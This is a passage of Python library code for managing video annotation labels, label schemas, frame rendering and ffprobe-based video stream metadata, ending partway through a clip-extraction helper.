def clear_video_attributes(self):
"""Removes all video-level attributes from the video."""
self.attrs = etad.AttributeContainer()
def clear_frame_attributes(self):
"""Removes all frame-level attributes from the video."""
for frame_labels in self.iter_frames():
frame_labels.clear_frame_attributes()
def clear_video_objects(self):
"""Removes all `VideoObject`s from the video."""
self.objects = etao.VideoObjectContainer()
def clear_detected_objects(self):
"""Removes all `DetectedObject`s from the video."""
for frame_labels in self.iter_frames():
frame_labels.clear_objects()
def clear_objects(self):
"""Removes all `VideoObject`s and `DetectedObject`s from the video."""
self.clear_video_objects()
self.clear_detected_objects()
def clear_video_events(self):
"""Removes all `VideoEvent`s from the video."""
self.events = etae.VideoEventContainer()
def clear_detected_events(self):
"""Removes all `DetectedEvent`s from the video."""
for frame_labels in self.iter_frames():
frame_labels.clear_events()
def clear_events(self):
"""Removes all `VideoEvent`s and `DetectedEvent`s from the video."""
self.clear_video_events()
self.clear_detected_events()
def clear_frames(self):
"""Removes all VideoFrameLabels from the video."""
self.frames.clear()
def remove_empty_frames(self):
"""Removes all empty VideoFrameLabels from the video."""
self.frames = SortedDict(
{fn: vfl for fn, vfl in iteritems(self.frames) if not vfl.is_empty}
)
def merge_labels(self, video_labels, reindex=False):
"""Merges the given VideoLabels into this labels.
Args:
video_labels: a VideoLabels
reindex: whether to offset the `index` fields of objects,
polylines, keypoints, and events in `video_labels` before
merging so that all indexes are unique. The default is False
"""
if reindex:
self._reindex_objects(video_labels)
self._reindex_keypoints(video_labels)
self._reindex_polylines(video_labels)
self._reindex_events(video_labels)
# Merge metadata
if video_labels.has_filename and not self.has_filename:
self.filename = video_labels.filename
if video_labels.has_metadata and not self.has_metadata:
self.metadata = video_labels.metadata
if self.is_support_frozen or video_labels.is_support_frozen:
self.merge_support(video_labels.support)
if video_labels.has_mask_index and not self.has_mask_index:
self.mask_index = video_labels.mask_index
if video_labels.has_schema:
if self.has_schema:
self.schema.merge_schema(video_labels.schema)
else:
self.schema = video_labels.schema
# Merge labels
self.add_video_attributes(video_labels.attrs)
self.add_objects(video_labels.objects)
self.add_events(video_labels.events)
for frame_labels in video_labels.iter_frames():
self.add_frame(frame_labels, overwrite=False)
def filter_by_schema(self, schema):
"""Filters the labels by the given schema.
Args:
schema: a VideoLabelsSchema
"""
self.attrs.filter_by_schema(schema.attrs)
self.objects.filter_by_schema(schema.objects)
self.events.filter_by_schema(schema.events)
for frame_labels in self.iter_frames():
frame_labels.filter_by_schema(schema)
def remove_objects_without_attrs(self, labels=None):
"""Removes objects from the VideoLabels that do not have attributes.
Args:
labels: an optional list of object label strings to which to
restrict attention when filtering. By default, all objects are
processed
"""
self.objects.remove_objects_without_attrs(labels=labels)
self.events.remove_objects_without_attrs(labels=labels)
for frame_labels in self.iter_frames():
frame_labels.remove_objects_without_attrs(labels=labels)
def attributes(self):
"""Returns the list of class attributes that will be serialized.
Returns:
a list of attributes
"""
_attrs = []
if self.filename:
_attrs.append("filename")
if self.metadata:
_attrs.append("metadata")
if self.has_schema:
_attrs.append("schema")
if self.is_support_frozen:
_attrs.append("support")
if self.has_mask_index:
_attrs.append("mask_index")
if self.attrs:
_attrs.append("attrs")
if self.frames:
_attrs.append("frames")
if self.objects:
_attrs.append("objects")
if self.events:
_attrs.append("events")
return _attrs
@classmethod
def from_objects(cls, objects):
"""Builds a VideoLabels instance from a container of objects.
If a DetectedObjectContainer is provided, the `DetectedObject`s must
have their `frame_number`s set.
Args:
objects: a VideoObjectContainer or DetectedObjectContainer
Returns:
a VideoLabels
"""
labels = cls()
labels.add_objects(objects)
return labels
@classmethod
def from_events(cls, events):
"""Builds a VideoLabels instance from an event container.
If a DetectedEventContainer is provided, the `DetectedEvent`s must
have their `frame_number`s set.
Args:
events: a VideoEventContainer or DetectedEventContainer
Returns:
a VideoLabels
"""
labels = cls()
labels.add_events(events)
return labels
@classmethod
def from_dict(cls, d):
"""Constructs a VideoLabels from a JSON dictionary.
Args:
d: a JSON dictionary
Returns:
a VideoLabels
"""
filename = d.get("filename", None)
metadata = d.get("metadata", None)
if metadata is not None:
metadata = VideoMetadata.from_dict(metadata)
support = d.get("support", None)
if support is not None:
support = etaf.FrameRanges.from_dict(support)
mask_index = d.get("mask_index", None)
if mask_index is not None:
mask_index = etad.MaskIndex.from_dict(mask_index)
attrs = d.get("attrs", None)
if attrs is not None:
attrs = etad.AttributeContainer.from_dict(attrs)
frames = d.get("frames", None)
if frames is not None:
frames = {
int(fn): VideoFrameLabels.from_dict(vfl)
for fn, vfl in iteritems(frames)
}
objects = d.get("objects", None)
if objects is not None:
objects = etao.VideoObjectContainer.from_dict(objects)
events = d.get("events", None)
if events is not None:
events = etae.VideoEventContainer.from_dict(events)
schema = d.get("schema", None)
if schema is not None:
schema = VideoLabelsSchema.from_dict(schema)
return cls(
filename=filename,
metadata=metadata,
support=support,
mask_index=mask_index,
attrs=attrs,
frames=frames,
objects=objects,
events=events,
schema=schema,
)
def _ensure_frame(self, frame_number):
if not self.has_frame(frame_number):
self.frames[frame_number] = VideoFrameLabels(
frame_number=frame_number
)
def _add_detected_object(self, obj, frame_number):
if frame_number is None:
if not obj.has_frame_number:
raise ValueError(
"Either `frame_number` must be provided or the "
"DetectedObject must have its `frame_number` set"
)
frame_number = obj.frame_number
obj.frame_number = frame_number
self._ensure_frame(frame_number)
self.frames[frame_number].add_object(obj)
def _add_detected_objects(self, objects, frame_number):
for obj in objects:
self._add_detected_object(obj, frame_number)
def _add_detected_event(self, event, frame_number):
if frame_number is None:
if not event.has_frame_number:
raise ValueError(
"Either `frame_number` must be provided or the "
"DetectedEvent must have its `frame_number` set"
)
frame_number = event.frame_number
event.frame_number = frame_number
self._ensure_frame(frame_number)
self.frames[frame_number].add_event(event)
def _add_detected_events(self, events, frame_number):
for event in events:
self._add_detected_event(event, frame_number)
def _add_frame_labels(self, frame_labels, frame_number, overwrite):
if frame_number is None:
if not frame_labels.has_frame_number:
raise ValueError(
"Either `frame_number` must be provided or the "
"FrameLabels must have its `frame_number` set"
)
frame_number = frame_labels.frame_number
if overwrite or not self.has_frame(frame_number):
if not isinstance(frame_labels, VideoFrameLabels):
frame_labels = VideoFrameLabels.from_frame_labels(frame_labels)
frame_labels.frame_number = frame_number
self.frames[frame_number] = frame_labels
else:
self.frames[frame_number].merge_labels(frame_labels)
def _compute_support(self):
frame_ranges = etaf.FrameRanges.from_iterable(self.frames.keys())
frame_ranges.merge(*[obj.support for obj in self.objects])
frame_ranges.merge(*[event.support for event in self.events])
return frame_ranges
def _reindex_objects(self, video_labels):
self_indexes = self.get_object_indexes()
if not self_indexes:
return
new_indexes = video_labels.get_object_indexes()
if not new_indexes:
return
offset = max(self_indexes) + 1 - min(new_indexes)
video_labels.offset_object_indexes(offset)
def _reindex_keypoints(self, video_labels):
self_indexes = self.get_keypoints_indexes()
if not self_indexes:
return
new_indexes = video_labels.get_keypoints_indexes()
if not new_indexes:
return
offset = max(self_indexes) + 1 - min(new_indexes)
video_labels.offset_keypoints_indexes(offset)
def _reindex_polylines(self, video_labels):
self_indexes = self.get_polyline_indexes()
if not self_indexes:
return
new_indexes = video_labels.get_polyline_indexes()
if not new_indexes:
return
offset = max(self_indexes) + 1 - min(new_indexes)
video_labels.offset_polyline_indexes(offset)
def _reindex_events(self, video_labels):
self_indexes = self.get_event_indexes()
if not self_indexes:
return
new_indexes = video_labels.get_event_indexes()
if not new_indexes:
return
offset = max(self_indexes) + 1 - min(new_indexes)
video_labels.offset_event_indexes(offset)
class VideoLabelsSchema(FrameLabelsSchema):
"""Schema describing the content of one or more VideoLabels.
VideoLabelsSchema introduces the term "video-level attribute", which is
merely an alias for the term "constant frame attribute" as used in
`FrameLabelsSchema`s.
Attributes:
attrs: an AttributeContainerSchema describing the video-level
attributes of the video(s)
frames: an AttributeContainerSchema describing the frame-level
attributes of the video(s)
objects: an ObjectContainerSchema describing the objects of the
video(s)
keypoints: a KeypointsContainerSchema describing the keypoints of the
video(s)
polylines: a PolylineContainerSchema describing the polylines of the
video(s)
events: an EventContainerSchema describing the events of the video(s)
"""
@property
def has_video_attributes(self):
"""Whether the schema has at least one video-level AttributeSchema.
This property is an alias for `has_constant_attributes`.
"""
return self.has_constant_attributes
def has_video_attribute(self, attr_name):
"""Whether the schema has a video-level attribute with the given name.
This method is an alias for `has_constant_attribute()`.
Args:
attr_name: the video-level attribute name
Returns:
True/False
"""
return self.has_constant_attribute(attr_name)
def get_video_attribute_schema(self, attr_name):
"""Gets the AttributeSchema for the video-level attribute with the
given name.
This method is an alias for `get_video_attribute_schema()`.
Args:
attr_name: the video-level attribute name
Returns:
the AttributeSchema
"""
return self.get_constant_attribute_schema(attr_name)
def get_video_attribute_class(self, attr_name):
"""Gets the Attribute class for the video-level attribute with the
given name.
This method is an alias for `get_constant_attribute_class()`.
Args:
attr_name: the video-level attribute name
Returns:
the Attribute class
"""
return self.get_constant_attribute_class(attr_name)
def add_video_attribute(self, attr):
"""Adds the given video-level attribute to the schema.
This method is an alias for `add_constant_attribute()`.
Args:
attr: an Attribute
"""
self.add_constant_attribute(attr)
def add_video_attributes(self, attrs):
"""Adds the given video-level attributes to the schema.
This method is an alias for `add_constant_attributes()`.
Args:
attrs: an AttributeContainer
"""
self.add_constant_attributes(attrs)
def is_valid_video_attribute(self, attr):
"""Whether the video-level attribute is compliant with the schema.
This method is an alias for `is_valid_constant_attribute()`.
Args:
attr: an Attribute
Returns:
True/False
"""
return self.is_valid_constant_attribute(attr)
def is_valid_video_attributes(self, attrs):
"""Whether the video-level attributes are compliant with the schema.
This method is an alias for `is_valid_constant_attributes()`.
Args:
attrs: an AttributeContainer
Returns:
True/False
"""
return self.is_valid_constant_attributes(attrs)
def validate_video_attribute(self, attr):
"""Validates that the video-level attribute is compliant with the
schema.
This method is an alias for `validate_constant_attribute()`.
Args:
attr: an Attribute
Raises:
LabelsSchemaError: if the attribute violates the schema
"""
self.validate_constant_attribute(attr)
def validate_video_attributes(self, attrs):
"""Validates that the video-level attributes are compliant with the
schema.
This method is an alias for `validate_constant_attributes()`.
Args:
attrs: an AttributeContainer
Raises:
LabelsSchemaError: if the attributes violate the schema
"""
self.validate_constant_attributes(attrs)
def validate(self, video_labels):
"""Validates that the video labels are compliant with the schema.
Args:
video_labels: a VideoLabels
Raises:
LabelsSchemaError: if the labels violate the schema
"""
self.validate_video_labels(video_labels)
@classmethod
def build_active_schema(cls, video_labels):
"""Builds a VideoLabelsSchema that describes the active schema of the
given labels.
Args:
video_labels: a VideoLabels
Returns:
a VideoLabelsSchema
"""
return cls.build_active_schema_for_video_labels(video_labels)
class VideoLabelsFrameRenderer(etal.LabelsFrameRenderer):
"""Class for rendering VideoLabels at the frame-level.
See the VideoLabels class docstring for the framewise format spec.
"""
_LABELS_CLS = VideoLabels
_FRAME_LABELS_CLS = VideoFrameLabels
def __init__(self, video_labels):
"""Creates a VideoLabelsFrameRenderer instance.
Args:
video_labels: a VideoLabels
"""
self._video_labels = video_labels
def render(self, in_place=False):
"""Renders the VideoLabels in framewise format.
Args:
in_place: whether to perform the rendering in-place. By default,
this is False
Returns:
a VideoLabels
"""
labels = self._video_labels
frames = self.render_all_frames(in_place=in_place)
if in_place:
# Render in-place
labels.clear_video_attributes()
labels.clear_video_objects()
labels.clear_video_events()
labels.clear_frames()
labels.frames = frames
return labels
# Render new copy of labels
filename = deepcopy(labels.filename)
metadata = deepcopy(labels.metadata)
if labels.is_support_frozen:
support = deepcopy(labels.support)
else:
support = None
mask_index = deepcopy(labels.mask_index)
schema = deepcopy(labels.schema)
return VideoLabels(
filename=filename,
metadata=metadata,
support=support,
mask_index=mask_index,
frames=frames,
schema=schema,
)
def render_frame(self, frame_number, in_place=False):
"""Renders the VideoLabels for the given frame.
Args:
frame_number: the frame number
in_place: whether to perform the rendering in-place (i.e., without
deep copying objects). By default, this is False
Returns:
a VideoFrameLabels, or None if no labels exist for the given frame
"""
if frame_number not in self._video_labels.support:
return None
video_attrs = self._get_video_attrs()
dobjs = self._render_object_frame(frame_number, in_place)
devents = self._render_event_frame(frame_number, in_place)
return self._render_frame(
frame_number, video_attrs, dobjs, devents, in_place
)
def render_all_frames(self, in_place=False):
"""Renders the VideoLabels for all possible frames.
Args:
in_place: whether to perform the rendering in-place (i.e., without
deep copying objects). By default, this is False
Returns:
a dictionary mapping frame numbers to VideoFrameLabels instances
"""
video_attrs = self._get_video_attrs()
dobjs_map = self._render_all_object_frames(in_place)
devents_map = self._render_all_event_frames(in_place)
frame_labels_map = {}
for frame_number in self._video_labels.support:
dobjs = dobjs_map.get(frame_number, None)
devents = devents_map.get(frame_number, None)
frame_labels_map[frame_number] = self._render_frame(
frame_number, video_attrs, dobjs, devents, in_place
)
return frame_labels_map
def _render_frame(
self, frame_number, video_attrs, dobjs, devents, in_place
):
labels = self._video_labels
# Base VideoFrameLabels
if labels.has_frame(frame_number):
frame_labels = labels.get_frame(frame_number)
if not in_place:
frame_labels = deepcopy(frame_labels)
else:
frame_labels = VideoFrameLabels(frame_number=frame_number)
# Render video-level attributes
if video_attrs is not None:
#
# Prepend video-level attributes
#
# We cannot avoid `deepcopy` here because video-level attributes
# must be embedded in each frame
#
frame_labels.attrs.prepend_container(deepcopy(video_attrs))
# Render objects
if dobjs is not None:
frame_labels.add_objects(dobjs)
# Render events
if devents is not None:
frame_labels.add_events(devents)
return frame_labels
def _render_object_frame(self, frame_number, in_place):
labels = self._video_labels
if not labels.has_video_objects:
return None
r = etao.VideoObjectContainerFrameRenderer(labels.objects)
return r.render_frame(frame_number, in_place=in_place)
def _render_all_object_frames(self, in_place):
labels = self._video_labels
if not labels.has_video_objects:
return {}
r = etao.VideoObjectContainerFrameRenderer(labels.objects)
return r.render_all_frames(in_place=in_place)
def _render_event_frame(self, frame_number, in_place):
labels = self._video_labels
if not labels.has_video_events:
return None
r = etae.VideoEventContainerFrameRenderer(labels.events)
return r.render_frame(frame_number, in_place=in_place)
def _render_all_event_frames(self, in_place):
labels = self._video_labels
if not labels.has_video_events:
return {}
r = etae.VideoEventContainerFrameRenderer(labels.events)
return r.render_all_frames(in_place=in_place)
def _get_video_attrs(self):
labels = self._video_labels
if not labels.has_video_attributes:
return None
# There's no need to avoid `deepcopy` here when `in_place == True`
# because copies of video-level attributes must be made for each frame
video_attrs = deepcopy(labels.attrs)
for attr in video_attrs:
attr.constant = True
return video_attrs
class VideoLabelsSpatiotemporalRenderer(etal.LabelsSpatiotemporalRenderer):
"""Class for rendering VideoLabels in spatiotemporal format.
See the VideoLabels class docstring for the spatiotemporal format spec.
"""
_LABELS_CLS = VideoLabels
def __init__(self, video_labels):
"""Creates a VideoLabelsSpatiotemporalRenderer instance.
Args:
video_labels: a VideoLabels
"""
self._video_labels = video_labels
def render(self, in_place=False):
"""Renders the VideoLabels in spatiotemporal format.
Args:
in_place: whether to perform the rendering in-place. By default,
this is False
Returns:
a VideoLabels
"""
labels = self._video_labels
if not in_place:
labels = deepcopy(labels)
# Ensure that existing `VideoObject`s are in spatiotemporal format
obj_renderer = etao.VideoObjectContainerSpatiotemporalRenderer(
labels.objects
)
obj_renderer.render(in_place=True)
# Ensure that existing `VideoEvent`s are in spatiotemporal format
event_renderer = etae.VideoEventContainerSpatiotemporalRenderer(
labels.events
)
event_renderer.render(in_place=True)
# Upgrade spatiotemporal elements from frames
attrs, objects, events = strip_spatiotemporal_content_from_frames(
labels
)
labels.attrs.add_container(attrs)
labels.add_objects(objects)
labels.add_events(events)
labels.remove_empty_frames()
return labels
def strip_spatiotemporal_content_from_frames(video_labels):
"""Strips the spatiotemporal content from the frames of the given
VideoLabels.
The input labels are modified in-place.
Args:
video_labels: a VideoLabels
Returns:
attrs: an AttributeContainer of constant frame attributes. By
convention, these attributes are no longer marked as constant, as
this is assumed to be implicit
objects: a VideoObjectContainer containing the objects that were
stripped from the frames
events: a VideoEventContainer containing the events that were stripped
from the frames
"""
# Extract spatiotemporal content from frames
attrs_map = {}
dobjs = etao.DetectedObjectContainer()
devents = etae.DetectedEventContainer()
for frame_labels in video_labels.iter_frames():
# Extract objects
dobjs.add_container(frame_labels.pop_objects())
# Extract events
devents.add_container(frame_labels.pop_events())
# Extract constant attributes
for const_attr in frame_labels.attrs.pop_constant_attrs():
# @todo could verify here that duplicate constant attributes are
# exactly equal, as they should be
attrs_map[const_attr.name] = const_attr
# Store video-level attributes in a container with `constant == False`
attrs = etad.AttributeContainer()
for attr in itervalues(attrs_map):
attr.constant = False
attrs.add(attr)
# Build VideoObjects
objects = etao.VideoObjectContainer.from_detections(dobjs)
# Build VideoEvents
events = etae.VideoEventContainer.from_detections(devents)
return attrs, objects, events
class VideoSetLabels(etal.LabelsSet):
"""Class encapsulating labels for a set of videos.
VideoSetLabels support item indexing by the `filename` of the VideoLabels
instances in the set.
VideoSetLabels instances behave like defaultdicts: new VideoLabels
instances are automatically created if a non-existent filename is accessed.
VideoLabels without filenames may be added to the set, but they cannot be
accessed by `filename`-based lookup.
Attributes:
videos: an OrderedDict of VideoLabels with filenames as keys
schema: a VideoLabelsSchema describing the schema of the labels
"""
_ELE_ATTR = "videos"
_ELE_KEY_ATTR = "filename"
_ELE_CLS = VideoLabels
_ELE_CLS_FIELD = "_LABELS_CLS"
def sort_by_filename(self, reverse=False):
"""Sorts the VideoLabels in this instance by filename.
VideoLabels without filenames are always put at the end of the set.
Args:
reverse: whether to sort in reverse order. By default, this is
False
"""
self.sort_by("filename", reverse=reverse)
def clear_video_attributes(self):
"""Removes all video-level attributes from all VideoLabels in the set.
"""
for video_labels in self:
video_labels.clear_video_attributes()
def clear_frame_attributes(self):
"""Removes all frame-level attributes from all VideoLabels in the set.
"""
for video_labels in self:
video_labels.clear_frame_attributes()
def clear_video_objects(self):
"""Removes all `VideoObject`s from all VideoLabels in the set."""
for video_labels in self:
video_labels.clear_video_objects()
def clear_detected_objects(self):
"""Removes all `DetectedObject`s from all VideoLabels in the set."""
for video_labels in self:
video_labels.clear_detected_objects()
def clear_objects(self):
"""Removes all `VideoObject`s and `DetectedObject`s from all
VideoLabels in the set.
"""
for video_labels in self:
video_labels.clear_objects()
def clear_video_events(self):
"""Removes all `VideoEvent`s from all VideoLabels in the set."""
for video_labels in self:
video_labels.clear_video_events()
def clear_detected_events(self):
"""Removes all `DetectedEvent`s from all VideoLabels in the set."""
for video_labels in self:
video_labels.clear_detected_events()
def clear_events(self):
"""Removes all `VideoEvent`s and `DetectedEvent`s from all VideoLabels
in the set.
"""
for video_labels in self:
video_labels.clear_events()
def get_filenames(self):
"""Returns the set of filenames of VideoLabels in the set.
Returns:
the set of filenames
"""
return set(vl.filename for vl in self if vl.filename)
def remove_objects_without_attrs(self, labels=None):
"""Removes objects from the VideoLabels in the set that do not have
attributes.
Args:
labels: an optional list of object label strings to which to
restrict attention when filtering. By default, all objects are
processed
"""
for video_labels in self:
video_labels.remove_objects_without_attrs(labels=labels)
@classmethod
def from_video_labels_patt(cls, video_labels_patt):
"""Creates a VideoSetLabels from a pattern of VideoLabels files.
Args:
video_labels_patt: a pattern with one or more numeric sequences
for VideoLabels files on disk
Returns:
a VideoSetLabels instance
"""
return cls.from_labels_patt(video_labels_patt)
class BigVideoSetLabels(VideoSetLabels, etas.BigSet):
"""A BigSet of VideoLabels.
Behaves identically to VideoSetLabels except that each VideoLabels is
stored on disk.
BigVideoSetLabels store a `backing_dir` attribute that specifies the path
on disk to the serialized elements. If a backing directory is explicitly
provided, the directory will be maintained after the BigVideoSetLabels
object is deleted; if no backing directory is specified, a temporary
backing directory is used and is deleted when the BigVideoSetLabels
instance is garbage collected.
Attributes:
videos: an OrderedDict whose keys are filenames and whose values are
uuids for locating VideoLabels on disk
schema: a VideoLabelsSchema describing the schema of the labels
backing_dir: the backing directory in which the VideoLabels
are/will be stored
"""
def __init__(self, videos=None, schema=None, backing_dir=None):
"""Creates a BigVideoSetLabels instance.
Args:
videos: an optional dictionary or list of (key, uuid) tuples for
elements in the set
schema: an optional VideoLabelsSchema to enforce on the object.
By default, no schema is enforced
backing_dir: an optional backing directory in which the VideoLabels
are/will be stored. If omitted, a temporary backing directory
is used
"""
etas.BigSet.__init__(self, backing_dir=backing_dir, videos=videos)
etal.HasLabelsSchema.__init__(self, schema=schema)
def empty_set(self):
"""Returns an empty in-memory VideoSetLabels version of this
BigVideoSetLabels.
Returns:
an empty VideoSetLabels
"""
return VideoSetLabels(schema=self.schema)
def filter_by_schema(self, schema):
"""Removes objects/attributes from the VideoLabels in the set that
are not compliant with the given schema.
Args:
schema: a VideoLabelsSchema
"""
for key in self.keys():
video_labels = self[key]
video_labels.filter_by_schema(schema)
self[key] = video_labels
def set_schema(self, schema, filter_by_schema=False, validate=False):
"""Sets the enforced schema to the given VideoLabelsSchema.
Args:
schema: a VideoLabelsSchema to assign
filter_by_schema: whether to filter labels that are not compliant
with the schema. By default, this is False
validate: whether to validate that the labels (after filtering, if
applicable) are compliant with the new schema. By default, this
is False
Raises:
LabelsSchemaError: if `validate` was `True` and this set contains
labels that are not compliant with the schema
"""
self.schema = schema
for key in self.keys():
video_labels = self[key]
video_labels.set_schema(
schema, filter_by_schema=filter_by_schema, validate=validate
)
self[key] = video_labels
def remove_objects_without_attrs(self, labels=None):
"""Removes all objects from the BigVideoSetLabels that do not have
attributes.
Args:
labels: an optional list of object label strings to which to
restrict attention when filtering. By default, all objects are
processed
"""
for key in self.keys():
video_labels = self[key]
video_labels.remove_objects_without_attrs(labels=labels)
self[key] = video_labels
class VideoStreamInfo(etas.Serializable):
"""Class encapsulating the stream info for a video."""
def __init__(self, stream_info, format_info, mime_type=None):
"""Creates a VideoStreamInfo instance.
Args:
stream_info: a dictionary of video stream info
format_info: a dictionary of video format info
mime_type: (optional) the MIME type of the video
"""
self.stream_info = stream_info
self.format_info = format_info
self._mime_type = mime_type
@property
def frame_size(self):
"""The (width, height) of each frame.
Raises:
VideoStreamInfoError: if the frame size could not be determined
"""
try:
# Must check if the video is rotated!
rotation = int(self.stream_info["tags"]["rotate"])
except (KeyError, ValueError):
rotation = 0
try:
width = int(self.stream_info["width"])
height = int(self.stream_info["height"])
if (rotation // 90) % 2:
logger.debug(
"Found video with rotation %d; swapping width and height",
rotation,
)
width, height = height, width
return width, height
except (KeyError, ValueError):
raise VideoStreamInfoError(
"Unable to determine frame size of the video"
)
@property
def aspect_ratio(self):
"""The aspect ratio of the video.
Raises:
VideoStreamInfoError: if the frame size could not be determined
"""
width, height = self.frame_size
return width * 1.0 / height
@property
def frame_rate(self):
"""The frame rate of the video.
Raises:
VideoStreamInfoError: if the frame rate could not be determined
"""
try:
try:
num, denom = self.stream_info["avg_frame_rate"].split("/")
return float(num) / float(denom)
except ZeroDivisionError:
num, denom = self.stream_info["r_frame_rate"].split("/")
return float(num) / float(denom)
except (KeyError, ValueError):
raise VideoStreamInfoError(
"Unable to determine frame rate of the video"
)
@property
def total_frame_count(self):
"""The total number of frames in the video, or -1 if it could not be
determined.
"""
try:
# try `nb_frames`
return int(self.stream_info["nb_frames"])
except KeyError:
pass
try:
# try `duration` x `frame rate`
return int(round(self.duration * self.frame_rate))
except VideoStreamInfoError:
pass
try:
#
# Fallback to `duration_ts` as a last resort. This will not be
# accurate for videos with `time_base` != 1, but the assumption is
# that one of the preceeding methods will have already worked for
# videos. This is here as a last resort for sequences of images,
# where `duration_ts` seems to directly contain the number of
# frames.
#
return int(self.stream_info["duration_ts"])
except KeyError:
pass
logger.warning("Unable to determine total frame count; returning -1")
return -1
@property
def duration(self):
"""The duration of the video, in seconds, or -1 if it could not be
determined.
"""
try:
# try `duration`
return float(self.stream_info["duration"])
except KeyError:
pass
try:
# try `duration_ts` x `time_base`
duration_ts = float(self.stream_info["duration_ts"])
num, denom = self.stream_info["time_base"].split("/")
return duration_ts * float(num) / float(denom)
except KeyError:
pass
try:
# try `duration` from format info
return float(self.format_info["duration"])
except KeyError:
pass
logger.warning("Unable to determine duration; returning -1")
return -1
@property
def size_bytes(self):
"""The size of the video on disk, in bytes, or -1 if it could not be
determined.
"""
try:
return int(self.format_info["size"])
except KeyError:
pass
logger.warning("Unable to determine video size; returning -1")
return -1
@property
def mime_type(self):
"""The MIME type of the video, or None if it is not available."""
return self._mime_type
@property
def encoding_str(self):
"""The video encoding string, or "" if it code not be found."""
_encoding_str = str(self.stream_info.get("codec_tag_string", ""))
if _encoding_str is None:
logger.warning("Unable to determine encoding string")
return _encoding_str
def attributes(self):
"""Returns the list of class attributes that will be serialized."""
return self.custom_attributes(dynamic=True)
@classmethod
def build_for(cls, video_path, mime_type=None, verbose=False):
"""Builds a VideoStreamInfo instance for the given video.
Args:
video_path: the path to the video
mime_type: the MIME type of the video, if already known
verbose: whether to generously log the process of extracting the
stream info. By default, this is False
Returns:
a VideoStreamInfo instance
"""
if verbose:
logger.info("Getting stream info for '%s'", video_path)
stream_info, format_info = _get_stream_info(
video_path, verbose=verbose
)
if verbose:
logger.info("Found format info: %s", etas.json_to_str(format_info))
logger.info(
"Found video stream: %s", etas.json_to_str(stream_info)
)
if mime_type is None:
mime_type = etau.guess_mime_type(video_path)
return cls(stream_info, format_info, mime_type=mime_type)
@classmethod
def from_dict(cls, d):
"""Constructs a VideoStreamInfo from a JSON dictionary.
Args:
d: a JSON dictionary
Returns:
a VideoStreamInfo
"""
stream_info = d["stream_info"]
format_info = d["format_info"]
mime_type = d.get("mime_type", None)
return cls(stream_info, format_info, mime_type=mime_type)
class VideoStreamInfoError(Exception):
"""Exception raised when a problem with a VideoStreamInfo occurs."""
pass
def _get_stream_info(inpath, verbose=False):
# Get stream info via ffprobe
ffprobe = FFprobe(
opts=[
"-show_format", # get format info
"-show_streams", # get stream info
"-print_format",
"json", # return in JSON format
]
)
out = ffprobe.run(inpath, decode=True, verbose=verbose)
info = etas.load_json(out)
# Get format info
format_info = info["format"]
# Get stream info
video_streams = [s for s in info["streams"] if s["codec_type"] == "video"]
num_video_streams = len(video_streams)
if num_video_streams == 1:
stream_info = video_streams[0]
elif num_video_streams == 0:
logger.warning("No video stream found; defaulting to first stream")
stream_info = info["streams"][0]
else:
logger.warning("Found multiple video streams; using first stream")
stream_info = video_streams[0]
return stream_info, format_info
def get_frame_rate(inpath):
"""Get the frame rate of the input video.
Args:
inpath: video path
Returns:
the frame rate
"""
return VideoStreamInfo.build_for(inpath).frame_rate
def get_frame_size(inpath):
"""Get the frame (width, height) of the input video.
Args:
inpath: video path
Returns:
the (width, height) of the video frames
"""
return VideoStreamInfo.build_for(inpath).frame_size
def get_frame_count(inpath):
"""Get the number of frames in the input video.
Args:
inpath: video path
Returns:
the frame count, or -1 if it could not be determined
"""
return VideoStreamInfo.build_for(inpath).total_frame_count
def get_duration(inpath):
"""Gets the duration of the video, in seconds.
Args:
inpath: video path
Returns:
the duration of the video, in seconds, or -1 if it could not be
determined
"""
return VideoStreamInfo.build_for(inpath).duration
def get_encoding_str(inpath):
"""Get the encoding string of the input video.
Args:
inpath: video path
Returns:
the encoding string
"""
return VideoStreamInfo.build_for(inpath).encoding_str
def get_raw_frame_number(raw_frame_rate, raw_frame_count, fps, sampled_frame):
"""Get the raw frame number corresponding to the given sampled frame
number.
This function assumes that the sampling was performed using the command::
FFmpeg(fps=fps).run(raw_video_path, ...)
Args:
raw_frame_rate: the frame rate of the raw video
raw_frame_count: the number of frames in the raw video
fps: the sampling rate that was used
sampled_frame: the sampled frame number
Returns:
raw_frame: the raw frame number from the input video corresponding to
the given sampled frame number
"""
delta = raw_frame_rate / (1.0 * fps)
raw_frame = np.minimum(
np.ceil(delta * (sampled_frame - 0.5)), raw_frame_count
)
return int(raw_frame)
def read_video_as_array(video_path):
"""Reads the video from the given path into an in-memory array.
CAUTION: in-memory videos are huge; use this at your own risk!
Args:
video_path: the path to the video to load
Returns:
a numpy array of size (num_frames, height, width, num_channels)
"""
with FFmpegVideoReader(video_path) as vr:
return np.asarray([img for img in vr])
def get_frame_range_for_clip(video_path, start_time=None, duration=None):
"""Gets a FrameRange instance describing the specified range of frames in
the given video.
Args:
video_path: the path to the video
start_time: the start timestamp, which can either be a float value of
seconds or a string in "HH:MM:SS.XXX" format. If omitted, the
beginning of the video is used
duration: the clip duration, which can either be a float value of
seconds or a string in "HH:MM:SS.XXX" format. If omitted, the clip
extends to the end of the video
Returns:
a FrameRange
"""
metadata = VideoMetadata.build_for(video_path)
if start_time is not None:
start_time = etaf.timestamp_to_seconds(start_time)
else:
start_time = 0
start_frame = metadata.get_frame_number(timestamp=start_time)
if duration is not None:
stop_time = start_time + duration
stop_frame = metadata.get_frame_number(timestamp=stop_time)
else:
stop_frame = metadata.total_frame_count
return etaf.FrameRanges.build_simple(start_frame, stop_frame)
def extract_clip(
video_path, output_path, start_time=None, duration=None, fast=False
):
"""Extracts the specified clip from the video.
When fast=False, the following ffmpeg command is used::
# Slower, more accurate option
ffmpeg -ss <start_time> -i <video_path> -t <duration> <output_path>
When fast is True, the following two-step ffmpeg process is used::
# Faster, less accurate option
ffmpeg -ss <start_time> -i <video_path> -t <duration> -c copy <tmp_path>
ffmpeg -i <tmp_path> <output_path>
Args:
video_path: the path to the video
output_path: the path to write the extracted video clip
start_time: the start timestamp, which can either be a float value of
seconds or a string in "HH:MM:SS.XXX" format. If omitted, the
beginning of the video is used
duration: the clip duration, which can either be a float value of
seconds or a string in "HH:MM:SS.XXX" format. If omitted, the clip
extends to the end of the video
fast: whether to use a faster-but-potentially-less-accurate strategy to
extract the clip. By default, the slow accurate strategy is used
"""
#
# @todo using FFmpeg directly here may not yield exact alignment with frame
# numbers generated by FFmpegVideoReader, VideoProcessor, etc. Should we
# use VideoProcessor here to ensure alignment?
#
in_opts = ["-vsync", "0"]
if start_time is not None:
if not etau.is_str(start_time):
start_time = "%.3f" % start_time
in_opts.extend(["-ss", start_time])
